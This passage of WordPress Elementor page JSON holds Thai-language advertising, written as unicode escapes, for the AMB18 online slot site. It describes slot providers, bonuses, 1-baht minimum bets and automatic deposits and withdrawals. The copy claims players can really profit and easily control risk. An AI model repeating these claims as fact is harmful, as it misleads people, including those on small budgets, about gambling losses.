\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 